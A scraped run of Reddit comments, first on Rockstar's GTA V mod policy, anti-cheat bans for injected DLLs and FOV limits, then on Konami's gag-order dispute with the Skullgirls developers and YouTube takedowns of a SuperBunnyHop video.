They had no reason to think that was a possibility though.  The sad thing is they have options for invite only (friends/crew) and solo online sessions. If I start up one of those, I should have the option to allow mods. Yeah I agree. Even if it freezes my whole character so I can't buy anything, but am giving whatever for free during the session. Or it makes me create a new character just for modded games. I don't know. [deleted] It's not that simple though. You also need to freeze progress so you couldn't do an all civilians drop a million dollars mod. Definitely possible, but possibly a good deal of work, so it makes sense why that isn't a priority for them. exactly, if you had any mods it would just place you in a modded lobby. That's fairly standard practice for quite a few games and it really shouldn't be that hard for Rockstar to implement. I guess it's too much work for them. There's a couple of project going on to achieve that I think, can't like because Imm on mobile just now.  [FiveM](http://fivem.net) is already functional (though still early in development, of course). While I agree a great idea, it would still need an online profile which is integral to GTA Online. The profile is what ties your character to their money which Rockstar monetizes.

Unless modders create a way to make say dummy accounts on dedicated servers that expires after a set amount of time? Expiring is only implemented to stop people playing only with the dummy accounts as opposed to playing the real game.

Spit balling idea's 
 FYI there are a few 3rd party online servers being worked on now that won't have the restrictions of the official rockstar ones.

Edit: such as http://multiv.mp/ and http://fivem.net/ We used to do this in Dark Forces 2 back in the day.  People would make hacks, called cogs if I remember correctly, and wed have big hacker battles on the premier online gaming service, Microsoft Zone.

For example, I remember one that would make your target spin in place at insane speeds.

God I feel old. There used to be a few CS servers like this too. Fun times.

They still have it, its just called matchmaking now though. Yup, I remember playing on servers like that. Good times.

There was even a poor man's Garry's Mod hack. You could place one of ten or so models over and over again, or delete models. Precisely, something that has been available to people with Jailbroken PS3s and JTAGed/RGH Xbox 360s for pretty much 2 years now. I suspected the people giving anicdotal evidence about being banned for mods in SP were either lying or didn't understand how detection worked.

For those wondering how to disable mods when you go online, Script Hook V mods are automatically disabled but if you want to be sure and/or have other mods that don't rely on Script Hook V you can use [this guide I wrote](https://www.reddit.com/r/GTAV_Mods/comments/34vmwu/how_to_write_a_batch_script_to_disableenable_mods/) which uses a bash script to rename and/or move your mods.

Edit: never mind [there is now a tool for this.](https://www.reddit.com/r/GrandTheftAutoV_PC/comments/34yeee/gta_v_launcher_enabledisable_mods_by_bilago/) It's still useful to know how to do it though as it works on other games. [deleted] [deleted] Why can't they just have an option to jump into modded lobbies and unmodded ones? Is that such a hard thing to create? Am I taking crazy pills? Needs new UI, needs a way to freeze characters, needs lots of extra things that aren't necessarily easy to do. Not that they can't but it's not like tweak a few settings and you have a new feature, it would probably require a good deal of work. I think the majority of people who claimed "I only use mods in singleplayer and I was banned in GTA: O" totally don't understand how Rockstar's cheat detection works.

If you have the mod loaded into the game files and log into GTA: O, as far as Rockstar is concerned, you are using a modification.  They don't care if you never opened up the trainer menu in GTA:O.  If you want to play GTA: O, just use the mod launcher to make sure that all mods are disabled before going online. The mod launcher? What is it? https://www.reddit.com/r/GrandTheftAutoV_PC/comments/34yeee/gta_v_launcher_enabledisable_mods_by_bilago/ Not very knowledgable on the modding scene, does this mean mods running during single player don't turn off for multiplayer? And you could be banned for even opening multiplayer while playing with mods single player?


That would just make me less likely to run mods. Depends what you mean by "turn off." When you go online, Rockstar's anticheat detects any modded files you have placed in the game folder, whether you actually activate the mod or not. All you have to do is remove the mod files from the folder before you go online.   So if you open the online menu accidentally then you are automatically banned by Rockstar's anti-cheat system for modding your game.

Again, this just makes me not want to mod my game at all if it's easy to get banned accidentally for online modding. Maybe they should separate the online and offline clients like CoD does. &gt; So if you open the online menu accidentally then you are automatically banned by Rockstar's anti-cheat system for modding your game.

To be fair certain mods like script hooks has scripts to prevent this...For example script hook will automatically CTD if someone tries to access online. going from story mode to multiplayer is not just selecting your online character, I think there is a popup asking confirmation if the player really wants to go online, people should just be careful. You can play in offline mode IIRC Interesting that people have already been banned for it though, however, you can never be too sure if anyone telling the truth, just because they made a post online saying they hadn't used mods online, doesn't mean they actually did.

Also, why don't they just add a larger FOV range, so people don't need to resort to a mod, which would get them banned if they want a larger FOV online. The issue is probably that when they install these mods, they forget to turn them off when they go online. Even though the person isn't actually using the mod online, the servers pick up that some code is running that shouldn't (after all I believe with the trainer, it has to run code to detect whether someone is activating it), and then autobans the person for hacking.

Of course Rockstar's servers can't tell the difference between a FOV mod and one that spawns infinite money. That's what I was thinking, too. Although if they can tell if you've got a mod running as you enter online, how hard would it be to just warn the player first before a ban is enacted? Your also warning cheaters that their software is detectable and they'll warn others. Generally developers like to find out about a cheat, collect details on people using it then mass ban them in a single wave. A better way to handle it would be to provide some sort of flag these mods could set that lets the game know you're running a mod.  You could then warn players that they're about to go online w/ a mod installed but not actually divulge that the anti-cheat engine detected something.  Granted that's not likely here since there isn't an actual modding API... I assume you mean have mods announce themselves to the game on launch and warn the player if they try to start multiplayer. I guess it could work as long as you don't warn people about unflagged mods, because otherwise your telling them their cheat can be found. That is generally also the best way of doing it, in my opinion, but it is more costly and doesn't deal with cheaters as fast. It doesn't deal with cheaters as quickly on average, but if you give them instant feedback, you make it easier for cheaters to evade your detection and the worst case gets worse. Absolutely, it's a bad short term solution. But from a business perspective for GTA 5 I guess it makes sense, since the online part of GTA doesn't have that much content aside from the heists. Gives hackers an open invitation to test their cheats and tools to skirt passed those checks.

If you look at companies like Blizzard or Valve, they stick you on a list and ban in waves at random times.  This is so the people making the hacks and cheats can't see what works and what doesn't work.  Your cheat can work just fine for 3 or 4 months and then you log in one day and find out you're banned. You're exactly right. It always bugs me when wannabe programmers act as if all this stuff is easy to design and develop when they're just talking out of their asses. My dad was playing the singleplayer game with the trainer to fuck around.

He's not been banned, and if their .dll detection system does pick up singleplayer it's clearly not working that way; most people are probably bullshitting because they're not ready to get shitblasted by the community for hacking (and as a result are too self conscious about their opinion on the internet)
 Actually, if you debug GTA, you'll see that the only time the function call for checking for dll injection is during multiplayer. So yeah, they don't check you in single player  Yeah I also believed that a lot of those "BUT I ONLY MODDED SP" were either bullshitting, or went online by accident.

Shame the community still jumps on the bandwagon so fast though, as it has happened numerous times before, where hackers and idiot start stirring up a storm because they were banned for a legitimate reason. [deleted] It seems like most of the people who claim to have only 'used mods' in single player, and been banned, are confused. What they don't realise is that if the mod is simply pasting a file into the right directory, the game is going to load that whether you're playing singleplayer or multiplayer. Even if you don't use the abilities the mod gives you, it's still loaded by the game, you're still 'using mods', and it's still going to be detected if you're playing online. You need to actually remove any extra files before playing online if you don't want to be banned. Yep, exactly this.

Even if you aren't using the trainer, Rockstar can still see the mod, as it's a memory injection and I'm pretty sure that's the only thing Rockstar's anti-cheat scans for, besides manual bans of course.

Would have been great if the game was made so that you launched single player and multi-player through different .exes, where each instance of the game had it's own library, but that would obliviously disrupt Rockstars  seamless single player to online function. It's really easy to connect to online, that's why some people think they have been banned from singleplayer. A lot of people also want a reason to hate on Rockstar, which made a number of high scoring posts and comments based on misinformation.

I personally use SP mods, which I remove by exiting the game and deleting the files and I have no ban. Absolutely. Rockstar seems to be able to identify if a player is using mods/.dll injection right out of the gate, I don't see why they couldn't prevent modded players from connecting to online in the first place. Because that would be  the perfect tool for a cheat developer. Slight change -&gt; try to launch -&gt; repeat.  Then why do they still have a cheater/hacker issue, if their software is so good at banning fov changers?
 He's not saying it's impossible to cheat. Just that it's bad to give an indication if a cheat is detected or not.  Same idea VAC uses to operate - Ban em for hacking, but do it days/weeks/months after the fact so that they don't know exactly what it was that got detected. So I need to remove the mods and then reinstall them when I leave SP? That's not a problem for simple stuff like the trainers or some crap like that that's really small size-wise, but what about when texture mods and nice shader mods start coming out? If those only replace textures, you won't get banned for those no matter what, ye?

Also, as for whether you're online or not, does that mean you didn't go into an online lobby, or that you launched the game in some offline mode? Makes me sign in automatically and fucks me if I try to start it up without internet connection.  I think textures would probably be an issue due to the possibility of making transparent textures and stuff Ive been pretty loose with mods, leaving the trainer running* while I'm online because I'm lazy,  I have luckily not had any reaction on my account from Rockstar, so is it safe to use the trainer/mods again? 

  

   
*and not using, I detest online cheaters I haven't played the PC version too much yet, but iirc with the PS4 version all you had to do was select the "online" character (the same as you would with Trever/etc. Is it that easy on PC?

If anything, i'd be worried that i would misclick on PC, and be banned. Is this a valid concern? No, the most recent trainer crashes on launching the multiplayer  Its actually rockstar that started the crash to desktop... The trainer, even the latest one would still let you online until monday evening.  It seems r* added something to the online handshake that causes the ctd. It specifically says nobody has been banned for that.

&gt;no one has been banned for using single player modifications, and you should not worry about being banned or being relegated to the cheater pool just for using single player PC mods. Exactly, so people must be going online with mods installed, even if you aren't physically using the mods, Rockstar is going to detect the .dll regardless. &gt; you can never be too sure if anyone telling the truth

"Riot banned me for no reason! I was just trying to provide helpful, kind feedback to my teammates and they all reported me!"

"Valve VAC-banned me and said I was wall-hacking and I totally wasn't!"

"Blizzard banned me for no reason! I never used gold-farming bots!"

Considering how often those statements are true, you actually *can* feel pretty confident that the recent flood of complaints were largely false. GTA:O was exploding with cheaters and all of a sudden people are claiming they're being banned for innocent single player mods? Sure thing, kids. Given that they already have a way of sorting people into different buckets (good sports, bad sports) why not just add a 3rd bucket of (cheaters and modders). They still get to play and do so without affecting non modded players, unfortunately modders and cheaters have to go in the same bucket as it's impossible to tell what you're doing when you're injecting dlls. This is actually done if you get banned a lot or something. why would rockstar pay to host servers that only cheaters and modders can play on?

seems like a waste of money to support fucking scumbags who intend to ruin the online experience for others. they should do it Valve style: Get VAC banned? Get the fuck off of our servers. You can't play on their matchmaking servers for Dota2/CSGO/TF2 if you have a VAC ban for that game or range of games. Obviously community servers still exist but those are player hosted and not going to cost Valve a dime (aside from the Master list server hosting) I'm pretty sure GTA:O is p2p hosted, no skin off Rockstars nose there. While I agree that cheaters should be banned but if its at the expense of modding (awesome thing come out of modding) I would hesitate. Everything in GTAO is routed through some Amazon EC2 servers, so there is a tiny bit of overhead. I'm pretty sure it's 100% just to mask IPs, though. They're banning people for using .dll injectors though. Not because they're changing the fov. And those people are probably forgetting to disable those dll injectors before (possibly accidentally) joining a MP session. Hence why I got banned. I thought I disabled them, joined multiplier and none were working so I thought I was safe, then the patch came around and suddenly I'm banned. I was never all that into the online stuff when it was on PS3, and frankly, I'm not *that* into it for PC either.

If I could get onto a modded server though?  I might get into it. &gt;They're banning people for using .dll injectors though. Not because they're changing the fov.

Is there any other way to change the FoV to a decent setting? There's Flawless Widescreen, but that works by modifying values in memory. I've heard some people say they've been banned for using it. Why do we have PC games that don't allow you to change the FOV? It's 2015 for Christ's sake. They couldn't have added in an FOV slider during any of those numerous delays? Because of the way the engine renders and works. It doesn't always load-in everything behind you or at some far points which aren't visible at the default fov. The game was built around the same FOV so the cinematics and gameplay would feel seemless and good. FOV shouldn't be a design choice made for us. It's preference for a lot of people Very true I can't play in first person mode because it gives me a headache after 5 minutes It's clearly not purely a design choice, there are technical reasons as well.  Is changing your FOV a config setting, or a mod? If it's a mod, they can't tell the difference between a FOV mod or a mod that does anything else. I have a feeling one of the reasons they won;t do it is because the camera is clearly designed to be at that FOV any higher and you start to see the camera clipping the geometry while in a car.Though from what I can tell that should be easily fixed so there's really no excuse. &gt; people have already been banned for it

source? and by that i mean actual proof, not unverifiable claims or circlejerk rumours. also be aware that this is the third time i have asked this question and am *still* yet to get a response apart from upvotes (which honestly don't fucking matter) I didn't word my original comment correctly , I've even replied to other comments saying that I'm sure a lot of people who got banned did actually have mods online despite them not using them, what I mean was, a lot of people are saying they were banned for only modding singe player, but if they go online with those mods still enabled, even if they don't use them, it's still going to show up on R* anti cheat. and i'm asking for actual proof of that statement, not unverifiable claims (like people saying they were banned for only modding single player mode) or circlejerk rumours. in other words i agree with what TotalBiscuit said in his recent video. It's interesting to see those posts. Especially the ones from people saying they were thrown money by someone who was cheating and were banned because of that. Why? Because the night before the initial banwave, I spawned in well over $100million between several players and none of us have been banned *yet*. I fully expect it to eventually get around to me when Rockstar review my account, but unless the flag for money gained in jobs is above $40million in one day or only applies to public games, the people saying they were banned for picking up money are either unlucky or full of shit.

Not to say that Rockstar can do anything but fuck off with their tedious online grind and its inherent limitations. Hopefully as many private server projects slip through the cracks as possible, or have key team members outside of western legal influence. LCPD:FR multiplayer was much more enjoyable than any official modes in GTA4 and SAPD:FR has the same potential. Back when people were giving out billions in winter 2013 on 360, a bunch of friends and I invested most of that money into high value cars on the chance that if the money gets reset, they hopefully wouldn't take the cars.

They didn't so we each had a 10 car garage worth like 5-6 mil. Just a thought. You guys invented money laundering in a game about being criminals. Can't they just make different .exe files for SP and multiplayer like in PC version of CoD? That would break the character switching and "seamless" transition from single to online, I believe. AKA, the super long loading times  It's actually really fast if you just start a closed session and invite only your friends -- I only found it slow when trying to join random public sessions. It's not the loading time, it's the time it takes you to find an open session with a similar connection. My cousin uses Google Fiber and never waits longer than 5 seconds when joining online. [deleted] Actually, thanks to the game's fantastic UI design, you technically can't start a new closed session from the online mode.

You have to load the game into story mode first, then go into the Online menu - you can start a closed session from there.

The game will then put you into free-roam all by yourself - you can invite friends as needed. From my experience, it will then keep you in that same free-roaming instance between missions, so you don't need to wait 2 minutes after a mission ends to move on. Your group *should* stay together as well, but in my experience sometimes it bugged out and I had to re-invite people. You're gonna love this... due to even shittier design you can get around this.  Start in play online, go to the editor, pause again &amp; you magically have the SP pause screen where you can start a private session. Significantly shorter than having to relaunch the game. Can't one exe launch another?  then you would reload the assets back into memory which would effectively just double your load time. huge waste of time. what they programmed isn't perfect but it isn't stupid either. You can transfer loaded assets with different methods of IPC, but it's a pain in the ass. (Easier with "fork" on a POSIX system.) It's just a lot of work that they wouldn't've wanted to bother with. Well, yes, but that still requires launching an executable during gameplay. That would still count as completely relaunching and would take a lot longer. Not if all I'm doing is planning on playing one or the other.  I rarely do both. Sure. But given the choice between faster SP/MP switching and mods, I'd choose mods. If when disconnected it just kept all the assets loaded and tried to reconnect or just have a button prompt to reconnect it would be far shorter than loading all the single player stuff again. No, but you can apply a command line to it to only launch SP. Really??? How do I do that? I've been meaning to try some mods, but I'm terrified of getting banned. Does that launch you straight into the single player game?  It doesn't load up any MP component correct. But I mean, it bypasses the game menu?  I launch the game, and once it's done loading, I'll be in the single player game? You can already set the game to do that from the options menu. The game puts you in SP if you don't do anything in the menu for a few seconds anyway. At least the Steam version does. Why don't they make it so multiplayer just doesn't start if mods are detected instead of just outright banning you? It really should. But not all mods work that way. Some do their work purely in memory. The reason to ban when mods are detected instead of just not letting you enter multiplayer is because doing so makes it much harder to cheat. Cheaters can get banned early on while developing their cheats instead of being able to keep trying until they find a way to get around the block.

Pretty much nobody writes software that works the first time. You always have to retry. I just purchased the game and havent tried MP yet. So how do keep Mods separated? Can someone explain this to me very detailed? As of now:

* Copy mod files into game directory if you want to play singleplayer
* If you want to play GTA:O, exit the game completely, delete the mod files from the game directory, start the game again Or use a mod manager This is the easiest way right now: https://www.reddit.com/r/GrandTheftAutoV_PC/comments/34yeee/gta_v_launcher_enabledisable_mods_by_bilago/ as usual people jumped the gun with these ridiculous claims that they were banning mods for SP. no shit they weren't. it might as well be the same situation with ENB and GTAIV where boris (creator of ENB) started making ridiculous claims that rockstar was trying to stop modding with the latest patch, and then made a hissy fit about how he wasn't going to update the ENB for the newest versions. turns out all rockstar did was change shadows which accidentally broke his mod.

now rockstar, wouldn't it just be easier for you just to add the ability to have the max FOV changed from 80 to 90 at least please? considering a modder did it the day after release, it will make everyone happy. it would make FP mode more playable, especially on online. i really hope they do this, it's quite strange to see they haven't properly acknowledged this yet. &gt; as usual people jumped the gun with these ridiculous claims

Pretty much the tagline for this subreddit.

Remember the Max Payne 3 authentication server drama? I hope that /r/games never gets any more stupid than that. Man, have you seen the gtav and gtavpc subs? Advocating piracy and all other manner of cringeworthy rage... Over something that didn't even happen (nobody was banned for offline mods).

I lost it when i saw them stating how r* was too stupid to develop for pc, a bunch of pc master race entitled nonesense, and that pc gamers should all go pirate it.  So rockstar will stop poluting their platform or some nonesense... And evidently the community agrees judging by the upvotes.


I swear, if i didnt know better i would think the internet is full of crazies.  The pc master race just isnt the pc master race now that these pc master race idiots came.  It makes me long for the console community.  Which i will add, abused the voice chat in game a hell of a lot lesd. If a modder did it and 30% of the time it doesn't work, it's fine. 


If R* did it and 0.5% of the time it fails, they will be the worst company of all time, equal real with ubi and EA The thing is, they already have a slider that works properly. They just chose to set the max possible to an arbitrarily low value.

People with triple monitor setups are getting a decent FoV, which means it's in the game, which means it should be possible. No shit you can use mods on single player. People have been up in arms like they would actually possibly intentionally/outright ban single player modifications. The problem is, a lot of these single player mods are using programs and hooks that cannot be distinguished from hacking programs... and considering the integration with RMT Transactions and the online functionality... That's why you use the Mod Launcher. &gt; We have a long-standing policy on posting copyrighted Rockstar Games material &lt;...&gt;, weve just added a bulletpoint about this particular type of content &lt;...&gt; anyone who posts videos that encourage and promote ways to cheat your way towards gaining illegitimate RP or counterfeit in-game money or duplicating in-game items without having earned them may have their videos flagged for takedown with YouTube.

Why is no one here talking about this? I for one say this new bullet point is great! Because as of right now if I get on youtube and try to find some moneymaking tips all I get is glitch exploit videos page after page. Maybe from now we'll be able to find more decent videos about GTA V Online tips and tricks. No shit. Anyone who got banned was dumb and connected to MP with mods enabled, then went and lied because they were mad.  I think the bigger story in this Q&amp;A is the fact there will not be new heists released any time soon. I basically read it as "No new heists ever" And there you have it. Just like I expected. People who got banned, got banned because they used mods in multiplayer. If you have a FOV mod you have an advantage in multiplayer, that other people don't have. If you use any dll injector, Rockstar can't know what mod you run. This is obvious and grants a ban. Rockstar are only banning for two weeks, so it's not too bad anyway. Just a whole lot of noise about nothing. &gt; If you have a FOV mod you have an advantage in multiplayer, that other people don't have.

I disagree with this unless the game is restricted to first-person only in which case yes it is unfair. Otherwise, especially in free-roam, having a larger FoV is no more an advantage than the guy that can see around corners in third person. Everybody keeps saying that using the FOV mod gives players an advantage, but if you have a tri-screen setup, you get a huge FOV using the vanilla game, so should that also not be allowed because of the advantage it provides? &gt; If you have a FOV mod you have an advantage in multiplayer, that other people don't have.

Every different aspect ratio has a different FOV. "Balance" is a bullshit nonsense argument. &gt; FOV mod you have an advantage in multiplayer

Except I can't even play first person with 70 FoV without feeling sick. 90 FoV is such a tiny advantage to begin with. IMO it's pretty dumb to be banned  for something that not only can other people already get with multi monitors, but something that actually makes that part of the game playable for me. awesome, now everyone can focus on how good single player and modding is compared to Online play, which is stale, repetitive and so boring. Who honestly still gets fun out of endless games of team deathmatch? People are mad because they either accidentally or on purpose went to connect to GTA Online while having those dlls in the main game directory. Rockstar scans your directory as soon as you decide to enter GTA:O, if it sees unacceptable files, they ban your account, simple as that.

GTA:O should not allow any sort of mods, no matter their purpose, ever. It should allow mods in private matches with friends or solo. Glad they have broken the silence on their mod policy. One thing to have it in the EULA or have the support teams making contradicting statements., but it's nice they made a statement without the legal mumbo-jumbo.

~~Edit : honest question, not complaining, but why am i being downvoted? It's one thing if I was off topic or spewing wrong information. But this is just opinion about the current situation.~~ ignore my whining.  [deleted] This is off topic but how on Earth do I obtain that sweet platinum Deagle with the gold hardware in that screenshot? Is that just what the platinum tint looks like on PC? That is a preview of the next content pack. The situation is still unclear about FoV mods it seems.

&gt;protecting GTA Online against modifications that could give players an unfair advantage

Are they categorzed as such or? You cannot tell what a DLL injector is doing, so those will always be rightly banned in online. Rockstar should fix the FOV though In order to avoid gray areas, GTAO should remain a completely *mod-free* game mode, including FoV mods.

As soon as you start allowing certain mods, then people will want other mods to work.  And now you have a situation where R* has to make a list of mods that do work, and don't work, and approve certain mods but not others.

This also opens exploitative loopholes for cheaters. They should just patch that stupid slider, sheesh  It's also a lot harder for anti-cheat software to tell the difference between an FOV mod and something more malicious like a wall hack. It seems pretty clear to me from my understanding FoV mod works like most, if not all other mods currently, which is DLL injecting and from what people smarter than me have said, you cannot whitelist or tell what someone is specifically doing with a dll.

So its not like they are specifically targeting FoV as an "unfair advantage". They're banning all mods online that use .dlls. That's how they're protecting "against modifications that could give players an unfair advantage", by killing the lot. It's impossible to determine what an injected DLL is doing. There's no real way for them to ban aimbots or wall hacks without also banning FOV mods that rely on similar methodology to work. &gt; Our primary focus is on protecting GTA Online against modifications that could give players an unfair advantage, disrupt gameplay, or cause griefing.


Because an FOV mod that makes the game so much more tolerable is unacceptable. And before you say "unfair advantage", remember that you can play in third person, and you can go *really* far away from your character in third person. There's really no reason to have such a narrow FOV in first person.


Still, I understand why they are doing what they are doing, and it is definitely good news to see that they aren't banning people for single-player mod use. So this is a good start. Hopefully, they can fix the damn FOV, and one of my main complaints about the game is solved. &gt;Because an FOV mod that makes the game so much more tolerable is unacceptable.

It doesn't work like that. They can't just block all but ONE particular mod. I'm very much aware, I think I misrepresented my point. I understand why they're blocking mods in Online, completely. 


What I was trying to say, was the FOV is ridiculous and I wish they would fix it.  I'm so happy to hear the rockstar editor is coming to PS4. But can someone tell me, are you able to use it to make videos from GTA Online? If not I'm not sure I want it after all. What about the single-player mods that implement multi-player? Great, so maybe we can stop diluting the Steam reviews section with even *more* bullshit than usual? I wonder if its possible to run win 7 in vmware while using dedicated hardware to run gta v and install as many as mods you want offline. yay let's just ban people instead of warning them and let those 10 year old play the game.
 
i'm done with rockstar It's good to see single player mods might make a return, it seemed strange to release a PC version of the game and not allow ANY mods for it. It'd be nice to see mods be useable in private lobbies, but it doesn't seem likely. This sort of behavior is nothing new for Konami, sadly.

In late 2013, Konami was the console publisher for Skullgirls. Konami delisted Skullgirls around the end of the year, much to the developers' displeasure. [Konami told the developers (Lab Zero Games) that they'd make the relisting process easier if they signed a lifetime gag order that'd prevent them from telling other people what shitty publishers they were](https://twitter.com/Skullgirls/status/597581781278334976). Lab Zero didn't sign, and it took another month or two for Skullgirls to return to the console marketplaces. They had to break ties with Konami to do so. Don't forget they blacklisted Jim Sterling after he said some unkind things about them and their games. 

Not like it stopped him from reviewing their games, he just had to buy them now. I think they even asked for an apology from Destructoid (where he worked) at the time. An apology from Jim Sterling for pointing out how shitty they were being... yeah. And the apology was just "a start". Of course, they didn't apologize. It is hard to justify supporting Konami at this point.  Which is a shame, because seeing the Konami logo used to mean quality. Now it means a company that doesn't give a shit.  back in the NES and SNES days, Capcom and Konami made some of the best 3rd party games on the systems. How the mighty have fallen! [:'\(](https://www.youtube.com/watch?v=C0vznFnBWAY) This is unfortunately the case for the majority of publishers these days. Just about every company has managed to burn half the bridges that allowed them to be successful in the past and they are barely treading water now because of it. I think part of it is that in the past we just didn't care.

I mean, when I was 8, I didn't give two fucks if the company who made TMNT Turtles in Time was shitty or not. There isn't anything stopping this from being true now except for the fact that these companies are spending millions and millions of dollars on games to try to reach as broad an audience as possible. This in turn means if they don't sell millions and millions of copies they are considered a flop financially. 

To be honest I would rather a game be good than worry about how amazing the graphics are =/ Hell yeah, alien isolation,  did poor because it "only" shipped 2.11 million copies, 

Yeah fuck off,  for a game that totally different from whats in (slow, minimal combat, atmospheric horror game, focus on appealing to existing fans) especially with it following the shit show that was Aliens:colonial marines,  it did really well.  That was like back when Square tried to say one of their games (I can't remember which exactly) did poorly when it sold 3m+ copies. To me if a game is selling even 2 million and isn't considered profitable then maybe something has to be changed.  It was the Tomb Raider reboot that they said that about.  That game has since gone on to do very well for them with the HD re-releases. Too much money is spent on advertising and middle-men who do nothing. Same thing that happens to every industry as it reaches past its infancy.  I feel like this is at the core of what's ailing the AAA industry right now. Great innovative games can't pay for themselves. TMNT Turtles in time wasn't shitty though!  It was a sequel and not so groundbreaking, but it was fun and popular for it.  These days Konami is just pumping out as much unplayable garbage as possible and trying to silence anyone that wants to tell you they're doing it.  

They could do very well with more fun games like they had back in the day when they owned the sidescrolling shooter and multiplayer action games... but they don't want to own, they just want to sell as much garbage as they can hide under DMCA letters.

Hell, at this point modernized sidescrolling "New Super Contra" would make a ton of money without taking forever to make, but nope, they make crap that's hard to like instead...  and get mad when people realize this truth. Quality doesn't leave enough room for profit, apparently. Maybe they should stop spending so much money making bad remakes of games nobody asked for and bad HD ports =P I like that they talk about diminishing sales, yet the franchise exclusive to one console.  Did that arrangement make up for lost sales?

Like others have said, I think they are using that as an excuse to get out of the business. It really does seem like they just want to get out of the gaming business for whatever reason. I just can't fathom any other reason considering how good most of their games used to be. Games aren't profitable, compared to the emerging markets they're trying to get in to (like gambling machines, if Japan decides to legalize them). And according to Jim, nothing changed with the blacklist, because they always forgot to send him review copies of the game either way. [Here's last weeks' Jimquisition, which discussed these things](https://www.youtube.com/watch?v=ynl4sIFazmM) It's funny because in the latest video he posted today he mentioned "Pretty soon they will be issuing DMCA for PT videos." Then this happens today. Pretty sad to see Konami taking this route =/ SEGA (of Japan) issued YouTube takedowns on Shining Force videos (including videos that had no actual game footage, such as 100%-webcam vlogs) to try to improve the search ranking for certain Shining Force videos put out by SEGA. A move that has John Bain (TotalBiscuit) boycotting them to this day.

(Also witness Nintendo's draconian YouTube policies in contrast to every other decent AAA company's.)

So that's three Japanese companies who are dickbags (bags of dicks) about video-form commentary and critique, or videos in general. Gee...I wonder if that's a pattern. That's the kind of thing that makes me want to flood YouTube with completely unrelated videos that have Shining Force in the title and as a tag.  "The Best Kubrick movie is The Shining force all your friends to watch it." It does seem to just be Japanese companies trying this (aside from the off shoot random tiny developer that wants to stop criticism for their badly done game). They have been doing some bizarre moves in general recently this just seems to be one more  In one of the last Jimq, Jim commented that they expected their games to get better reviews too.  And their embargo does't even really affect Jim, because Konami's shitty marketing department rarely send review copies out on time and Jim has been already buying his own games to review. What exactly is a lifetime gag order? It doesn't sound very legal to me.  "It is an order, typically a legal order by a court or government, restricting information or comment from being made public, or in some cases, passed onto any unauthorized third party. The phrase may sometimes be used of a private order by an employer or other institution."

Basically, they couldn't talk about how Konami treated them when they were publishing Skullgirls but since they didn't sign the form (and well managed to get game back to the stores), they can actually talk about the truth. This is typically a non-disparagement agreement, where in exchange for something from the publisher (publishing their game in this case) the developers would contractually not be able to say anything negative about Konami for risk of lawsuit. 

These non-disparagement clauses work because usually the non-disparagement clause comes from the assymmetrically powerful side. The most common in the US is an employer firing an employee and attaching the non-disparagement to a severance package. In this case, it's a publisher trying to force a developer.

EDIT: typo fix, said "developers" where I meant "publishers" Happily did not sign mine when they laid us all off. Their severance package was pitiful to begin with. I honestly wonder how enforcable such clauses are (specifically the "you're not allowed to be negative" bits). It's questionable, but certainly can have teeth if you make your criticisms openly public as opposed to just badmouthing them over dinner. 

There's actually a federal bill being proposed right now to make these clauses unenforceable. I'm a big fan, personally.

The ones I've seen don't say "you're not allowed to be negative", they actually say that both you and the company may not say anything other than to confirm that you worked there and were in good standing. So the gag claus applies to the company too, it's just that the company typically won't care if it's prevented from giving you a good or bad reference. While we're at it, let's get rid of those non-compete clauses that can be written with no expiration date as part of *severance agreements*. My friends in the legal field tell me that these are almost unenforceable, but that doesn't mean they're not a headache or that they don't intimidate people.  Disclaimer: IANAL

It depends on the country/state and the nature of the restriction. 

http://www.mayerbrown.com/Global-Guide-to-Restrictive-Covenants/ has a pretty good overview of these kinds of restrictions with breakdowns for many individual countries. (The relevant pdf is http://www.mayerbrown.com/files/uploads/Documents/Guide%20to%20Restrictive%20Covenants/MAYERBROWN_RESTRICTIVE_COVENANTS.pdf) Non-compete clauses are generally unenforceable if they are not reasonable and justifiable based on metrics of time and geography.

In other words, a non-compete clause cannot be for a significant period of time, nor a broad geographic region.  One to two years can be justified and reasonable.  But you cannot tell a person that they cannot practice their given trade for ten years (people need a way to make money.).  A non-compete within a given city or county is reasonable, but across the entire US would be unreasonable.  

 &gt;  So the gag claus applies to the company too, it's just that the company typically won't care if it's prevented from giving you a good or bad reference.

Technically this is already in place just nearly impossible to enforce.  When a company contacts an old employer, 'technically' they can only say when you started, when you left, and possibly how often you were late, called off, very factual things like that.  Not sure about the last part.  Anything more can get them sued for slander IF you can prove that it was the reason you were not hired but that is a very big if since the proof is on you prove it was a reason not on them to prove it wasn't.  probably isnt it would have likely been in actuallity an NDA which I believe might not have the same laws. It's just a clause in a contract. You break the clause, you break the contract. If you break a gag order that doesn't make you a criminal - just subject to the penalties of breaking your contract. [deleted] can we get a possible mirror link so we can see what the original video was? Mirror from the neogaf thread: http://m.neogaf.com/showthread.php?t=1044229

Youtube Mirror: https://youtube.com/watch?v=YNSVhbsJyDQ

Dropbox Link: https://www.dropbox.com/s/cbyvrrfyx1mp13i/Kojima%20vs.%20Konami%20An%20Investigation.mp4?dl=0 just a reminder to people who see superbunnyhop for the first time because of this thread - he makes a TON of *really well thought out* gaming videos. i definitely recommend checking out [his channel,](https://www.youtube.com/user/bunnyhopshow) it's really good stuff. Wow, he does put out some good stuff. I just watched [this](https://www.youtube.com/watch?v=emW15aLYbp4) video summing up the Valve paid mods fiasco from a coupe weeks ago, and it was a very well thought out synopsis of what happened. I started watching his stuff after this report and his stuff is real good. Well written, thought out, interesting perspectives (ie: how he didn't enjoy Spec Ops: The line but thinks it's a good game). I was for the paid mod stuff (in abstract) but he changed my mind with a slight different perspective. He hooked me with his Metal Gear Solid 2 and post-modernism video. That video is fucking awesome I love his videos and he is possibly one of the only people that can make so much sense out of MGS.  His intelligence and enthusiasm are obvious. The ONLY gripe I have is that sometimes he pronounces words a little funny. Like he has only read them and never heard it said out loud.  In "comparishun". The comparison with the ideals and the shortcomings thereof with Rapture was so perfect.  He's probably the only time 'game' and 'journalism' could be used together without busting out laughing Probably because he has an actual journalism degree. 

And avoids click baity topics/rumors/baseless speculation that all the other "games journalist" partake in. Does he have a Patreon or something? I would like to support him a bit more than usual if possible.  Thank you! While I liked the video, I can't help but feel that the presentation could have been greatly improved by just putting it together into a written format with pictures. I'm not a fan of "articles" being dictated orally to the background of images not necessarily important for the content. Especially when they're DMCA'd for the irrelevant images and stuff going on in the background. It is also back up as of this comment. What grounds for copyright infringement could there have been anyways?  [deleted] Yup, they have to do it this way because Youtube's system is not a TRUE DMCA claim to start with.

The initial DMCA claim is just a private matter with Youtube. If contested, the claimant has to either rescind the claim or file a real DMCA claim in court.

